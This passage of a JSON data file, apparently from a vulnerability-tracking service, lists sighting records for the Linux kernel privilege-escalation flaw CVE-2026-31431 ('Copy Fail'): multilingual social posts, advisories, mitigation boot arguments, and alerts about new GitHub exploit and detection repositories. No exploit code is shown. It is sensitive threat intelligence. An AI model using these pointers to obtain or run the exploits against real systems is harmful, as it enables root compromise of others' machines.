"9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/omo.bsky.social/post/3mkqh7i4h5c27", "content": "SIOS\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u30d6\u30ed\u30b0\u3092\u66f4\u65b0\u3057\u307e\u3057\u305f\u3002\n\nLinux Kernel\u306e\u30ed\u30fc\u30ab\u30eb\u30e6\u30fc\u30b6\u306b\u3088\u308b\u6a29\u9650\u6607\u683c\u306e\u8106\u5f31\u6027(Copy Fail: CVE-2026-31431)\n\n#security #vulnerability #\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3 #\u8106\u5f31\u6027 #linux #kernel #copyfail\n\nsecurity.sios.jp/vulnerabilit...", "creation_timestamp": "2026-04-30T20:27:29.904828Z"}, {"uuid": "1e0cf326-df53-4b4b-beb3-4b972c72174d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/master-sdl.bsky.social/post/3mkqkwv53qs2x", "content": "\u2757 Si vous administrez un PC sous Linux, toutes les distributions seraient concern\u00e9es par la CVE-2026-31431 (Local Privilege Escalation)\n\n\u2192 consultez ces recommandations :\ncert.europa.eu/publications...\n\n\u2192 rappel : mettez r\u00e9guli\u00e8rement \u00e0 jour votre syst\u00e8me pour b\u00e9n\u00e9ficier des mises \u00e0 jour de s\u00e9curit\u00e9", "creation_timestamp": "2026-04-30T21:34:16.878818Z"}, {"uuid": "1b3033bc-077b-470b-9feb-acc92ef9d203", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://ccb.belgium.be/advisories/warning-copy-fail-getting-root-major-linux-distributions-patch-immediately", "content": "", "creation_timestamp": "2026-04-30T12:50:07.000000Z"}, {"uuid": "ec89ef41-70a0-4075-89ff-8985a1b01e2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/dustymabe.fosstodon.org.ap.brid.gy/post/3mkqlqc6nosy2", "content": "The fix for CVE-2026-31431 (copy fail) has been released for Fedora CoreOS:\n\nhttps://lists.fedoraproject.org/archives/list/coreos@lists.fedoraproject.org/message/AEZV7QKPNXGECMYQO4T4W5IQR4X5B62F/", "creation_timestamp": "2026-04-30T21:49:14.587099Z"}, {"uuid": "1e114e9d-d204-4bfa-9419-9f294eac2609", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/johonotodai.bsky.social/post/3mkqlxoh7qs2c", "content": "\u305f\u3063\u305f732\u30d0\u30a4\u30c8\u306ePython\u3067Linux\u30b5\u30fc\u30d0\u9665\u843d\u30029\u5e74\u9593\u8ab0\u3082\u6c17\u3065\u304b\u306a\u304b\u3063\u305fCVE-2026-31431\u306e\u6b63\u4f53\n\n732\u30d0\u30a4\u30c8\u306ePython\u3067Ubuntu\u3001RHEL\u3001SUSE\u306eroot\u304c\u53d6\u308c\u308b\u6df1\u523b\u306a\u5185\u5bb9\u3067\u3001\u767a\u898b\u8005\u306fAI\u652f\u63f4\u30c4\u30fc\u30eb\u3067\u308f\u305a\u304b1\u6642\u9593\u3067\u898b\u3064\u3051\u305f\u3068\u5831\u544a\u3057\u3066\u3044\u307e\u3059\u3002\n\nyoutu.be/XW01k5tT--0\n\n#Linux #\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3 #AI\nCVE-2026-31431 details.", "creation_timestamp": "2026-04-30T21:52:38.586916Z"}, {"uuid": "a22930ce-38d9-47cc-b673-bdc3b865ba58", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/dailyzenntrends.bsky.social/post/3mkqmeaaaum27", "content": "\u4eca\u65e5\u306eZenn\u30c8\u30ec\u30f3\u30c9\n\nLinux\u30ab\u30fc\u30cd\u30eb\u306e\u8106\u5f31\u6027\u300cCopyFail (CVE-2026-31431)\u300d\u3092EC2\u306eUbuntu 22.04\u3067\u5b9f\u8a3c\u3057\u3066\u307f\u305f\nLinux\u30ab\u30fc\u30cd\u30eb\u306e\u8106\u5f31\u6027CopyFail (CVE-2026-31431) \u306b\u3064\u3044\u3066\u306e\u89e3\u8aac\u8a18\u4e8b\u3067\u3059\u3002\n\u4e00\u822c\u30e6\u30fc\u30b6\u30fc\u304c\u30da\u30fc\u30b8\u30ad\u30e3\u30c3\u30b7\u30e5\u3092\u6c5a\u67d3\u3059\u308b\u3053\u3068\u3067\u3001\u5bb9\u6613\u306broot\u6a29\u9650\u3092\u596a\u53d6\u3067\u304d\u308b\u3053\u3068\u3092\u5b9f\u8a3c\u3057\u3066\u3044\u307e\u3059\u3002\n\u30c7\u30a3\u30b9\u30af\u4e0a\u306e\u30d0\u30a4\u30ca\u30ea\u306f\u66f8\u304d\u63db\u308f\u3089\u306a\u3044\u305f\u3081\u691c\u77e5\u304c\u56f0\u96e3\u3067\u3042\u308a\u3001\u78ba\u8a8d\u306b\u306f\u30ad\u30e3\u30c3\u30b7\u30e5\u3068\u30c7\u30a3\u30b9\u30af\u306e\u30cf\u30c3\u30b7\u30e5\u6bd4\u8f03\u304c\u5fc5\u8981\u3067\u3059\u3002\n\u5bfe\u7b56\u3068\u3057\u3066\u65e9\u6025\u306a\u30d1\u30c3\u30c1\u9069\u7528\u304c\u63a8\u5968\u3055\u308c\u3066\u3044\u307e\u3059\u3002\n", "creation_timestamp": "2026-04-30T21:59:35.500778Z"}, {"uuid": "7ad0e2e9-677f-43fe-bf0c-23e45d533f34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ercanceviz.bsky.social/post/3mkqi3qbo7e2k", "content": "Linux\u2019ta Y\u0131llard\u0131r Kapat\u0131lmayan A\u00e7\u0131k Tespit\u00a0Edildi\n\nLinux \u00e7ekirde\u011finde ke\u015ffedilen Copy Fail (CVE-2026-31431) g\u00fcvenlik a\u00e7\u0131\u011f\u0131, yerel kullan\u0131c\u0131lar\u0131n root yetkisi almas\u0131na neden oluyor. Detaylar haberimizde.", "creation_timestamp": "2026-04-30T20:43:14.911726Z"}, {"uuid": "3fc67bf7-9116-4dcb-ab88-81c6f5977aa9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/intel.overresearched.net/post/3mkqibwl63k2m", "content": "TeamPCP trojanises 4 SAP npm packages, scrapes CI memory for cloud/GH secrets. Dormant backdoor in 70K WP sites. Linux LPE CVE-2026-31431. Qinglong RCE drops cryptominers ITW.\n\nFull brief: intel.overresearched.net/2026/04/30/c...\n\n#Daily #ThreatIntel #InfoSec", "creation_timestamp": "2026-04-30T20:46:43.820499Z"}, {"uuid": "2ddf31d1-9d86-43a2-a434-44fbd83ddfc2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/koshian.bsky.social/post/3mkqifqjlof26", "content": "\u3046\u30fc\u3093\u3001PoC \u307e\u3067\u516c\u958b\u3055\u308c\u3066\u3093\u306e\u304b\u3002\u30ed\u30fc\u30ab\u30eb\u304b\u3089\u6a29\u9650\u6607\u683c\u3067\u304d\u308b\u3060\u3051\u3060\u304b\u3089\u76f4\u3061\u306b\u5f71\u97ff\u306f\u306a\u3044\u306e\u304b\u3082\u77e5\u308c\u306a\u3044\u304c\u3081\u3061\u3083\u304f\u3061\u3083\u6016\u3044\u306a\u3002\u307e\u3042\u3046\u3061\u306f\u4f7f\u308f\u308c\u3066\u306a\u304b\u3063\u305f\u306e\u3067\u5f71\u97ff\u306f\u306a\u3044\u3060\u308d\u3046\u304c\u5bfe\u7b56\u3057\u3066\u304a\u3044\u305f\u307b\u3046\u304c\u3088\u3055\u305d\u3046\u304b\n\n\u300cCopy Fail\u300dCVE-2026-31431 \u2014 9\u5e74\u9593\u6f5c\u3093\u3067\u3044\u305f732\u30d0\u30a4\u30c8Python\u3067Linux\u304croot\u5316\u3055\u308c\u308b\u8106\u5f31\u6027\u3068\u5bfe\u7b56\uff5czephel01", "creation_timestamp": "2026-04-30T20:48:51.115736Z"}, {"uuid": "880c3e54-511d-4b5a-92c5-d2046baee527", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://infosec.exchange/users/vuldb/statuses/116497063036419923", "content": "Some increased actor activities are shown targeting Linux Kernel (CVE-2026-31431) https://vuldb.com/vuln/358784/cti", "creation_timestamp": "2026-05-01T02:55:11.869771Z"}, {"uuid": "ab9662a6-a229-438d-88b4-f510dd9ed0e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82237", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #POC #CVE\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431-Copy-Fail---Vulnerability-Detection-Script\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a liamromanis101\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-30 20:59:11\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nDetection Only.. working on an exploit PoC\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-04-30T21:00:33.000000Z"}, {"uuid": "4838bc73-1508-401b-9a27-db6c6740e885", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82195", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431-mitigation-rhel\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a jmac774\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-30 11:57:48\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-04-30T12:00:04.000000Z"}, {"uuid": "4749a640-6551-40df-91e3-a50caf1f9bdd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82199", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a JuanBindez\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-30 12:59:22\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCopy Fail - CVE-2026-31431\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-04-30T13:00:04.000000Z"}, {"uuid": "20f60a5e-ec29-439b-a18e-74ba28fbd984", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82201", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a copy-fail-go\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a cs8425\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-30 13:58:36\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCopy Fail - CVE-2026-31431 in golang\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-04-30T14:00:04.000000Z"}, {"uuid": "eb0be100-af9e-4a70-8bed-638e5fad3dc5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82221", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a copyfail\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a rfxn\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 1  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-30 15:44:09\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nDefense-in-depth primitives for CVE-2026-31431 (Copy Fail) \u2014 kernel detection probe and LD_PRELOAD AF_ALG block\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-04-30T16:00:05.000000Z"}, {"uuid": "54e0de2e-7f1f-467a-a2ff-e336d25741e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82153", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a ryan2929\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-30 06:56:44\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-04-30T07:00:04.000000Z"}, {"uuid": "9f9db697-b199-48dd-bce3-821f4a161d2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82156", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431-Linux-Copy-Fail\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a iss4cf0ng\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Rust\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-30 07:59:45\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nRust implementation Exploit/PoC of CVE-2026-31431-Linux-Copy-Fail, allow executing customized shellcode (such as Meterpreter).\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-04-30T08:00:04.000000Z"}, {"uuid": "5433b966-83c1-4aa9-991e-ad1d25170d19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82177", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431-exploit_py2_py3\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a jiangban046-spec\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-30 09:59:44\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u4e00\u4e2a\u517c\u5bb9python2\u548cpython3\u7684CVE-2026-31431\u811a\u672c\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-04-30T10:00:05.000000Z"}, {"uuid": "45264670-c4b1-47ae-a193-67e450a1b050", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/cyberkendra.com/post/3mkqnqtnoc227", "content": "CVE-2026-31431 \"Copy Fail\": a logic bug in the Linux kernel lets any local user get root on Ubuntu, RHEL, Amazon Linux, and SUSE since 2017.\n\nRead Details - www.cyberkendra.com/2026/04/a-73...\n\n#linuxsecurity #ubuntu #security #CopyFail #INTERNET", "creation_timestamp": "2026-04-30T22:24:38.482633Z"}, {"uuid": "d275dea8-8d01-4b97-88e5-591f371365fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/insomnia.gr/post/3mkqosppdke25", "content": "\u039a\u03c1\u03af\u03c3\u03b9\u03bc\u03b7 \u03b5\u03c5\u03c0\u03ac\u03b8\u03b5\u03b9\u03b1 (CVE-2026-31431) \u03c3\u03c4\u03bf kernel \u03c4\u03bf\u03c5 Linux \u03bc\u03b5 \u03c4\u03b7\u03bd \u03bf\u03bd\u03bf\u03bc\u03b1\u03c3\u03af\u03b1 Copy Fail, \u03b5\u03c0\u03b9\u03c4\u03c1\u03ad\u03c0\u03b5\u03b9 \u03b1\u03c0\u03cc\u03ba\u03c4\u03b7\u03c3\u03b7 root, \u03bc\u03b5 \u03b5\u03cd\u03ba\u03bf\u03bb\u03b7 \u03b5\u03ba\u03bc\u03b5\u03c4\u03ac\u03bb\u03bb\u03b5\u03c5\u03c3\u03b7 \u03ba\u03b1\u03b9 \u03b1\u03bd\u03ac\u03b3\u03ba\u03b7 \u03ac\u03bc\u03b5\u03c3\u03bf\u03c5 patch. www.insomnia.gr/articles/ope...", "creation_timestamp": "2026-04-30T22:43:28.338162Z"}, {"uuid": "0840882a-fe3a-45aa-a3af-9ca6c46f330e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/gullevek.famichiki.jp.ap.brid.gy/post/3mkqow7q6yml2", "content": "Copy Fail \u2014 CVE-2026-31431 https://copy.fail/\n\nAs usual it is so hard to find out if the mainline kernel is already patched or not.", "creation_timestamp": "2026-04-30T22:45:34.993937Z"}, {"uuid": "d0ca1c1f-e0da-4044-a4b9-53c653e03b9c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://infosec.exchange/users/wdormann/statuses/116496097678724677", "content": "Unlike what the buffoons at Theori published as a \"mitigation\", the folks at Red Hat actually published a viable mitigation\nSpecifically, edit your grub (or whatever you use to load your kernel) to have one of the following arguments:initcall_blacklist=algif_aead_initinitcall_blacklist=af_alg_initinitcall_blacklist=crypto_authenc_esn_module_init\nWith such boot arguments to the Linux kernel, the affected bits won't be reachable.", "creation_timestamp": "2026-04-30T22:49:42.453931Z"}, {"uuid": "0b37afe0-1da9-4a42-92b4-9ded6a0dde38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/bricebowl.bsky.social/post/3mkqqu4xrlc2n", "content": "The Ubuntu situation is wild:\n\u2022 Ubuntu posts guidance on CVE-2026-31431\n\u2022 Official mitigation fails if ran verbatim\n    - Delimed string argument with non-deliming quotes (double left/right - U+201)\n   - Redirects sudo output to protected file (Won\u2019t work unless you\u2019re root)\n\u2022 Gets DDoS'd \ud83d\udc80", "creation_timestamp": "2026-04-30T23:20:07.020648Z"}, {"uuid": "0296a9e9-be56-430c-ba87-7cc0f97c26e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/techpresso.bsky.social/post/3mkqri5dvnl2t", "content": "The flaw (CVE-2026-31431) stems from a logic bug in the kernel's cryptographic template, and a publicly available 732-byte exploit makes it highly reliable to execute. Major distributions have begun shipping patches.\n\nSource: BleepingComputer", "creation_timestamp": "2026-04-30T23:31:14.694369Z"}, {"uuid": "514dbcc9-b59d-4f98-b711-960e365c259f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82192", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431-CopyFail-Universal-LPE\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a shadowabi\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-30 10:54:43\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-04-30T11:00:05.000000Z"}, {"uuid": "c401c01b-e020-4846-b18b-a77ee40df0cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82105", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a copyfail-go\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a badsectorlabs\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Go\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-29 22:53:46\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nA Go implementation of copyfail (CVE-2026-31431)\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-04-29T23:00:04.000000Z"}, {"uuid": "c17c6369-45bc-4f4d-8704-f62e569d0c80", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82122", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a copy-fail-c\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a tgies\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 2  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 1\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-30 00:58:23\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCross-platform C port of the Copy Fail Linux LPE (CVE-2026-31431). Disclosed 2026-04-29 by Theori / Xint.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-04-30T01:00:04.000000Z"}, {"uuid": "1c45c48e-e078-415d-9425-bb55e7135c59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82145", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a cve-2026-31431-detection\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a thrandomv\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-30 04:56:46\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nDefensive detection package for CVE-2026-31431 (Linux kernel AF_ALG LPE). Sigma, Falco, auditd, KQL, and EQL rules mapped to MITRE ATT&CK T1068/T1611. Includes detection logic designed for auditd, eBPF, and EDR telemetry pipelines.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-04-30T05:00:04.000000Z"}, {"uuid": "9a0db283-3a10-47ac-a02e-bcadb26c41a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", 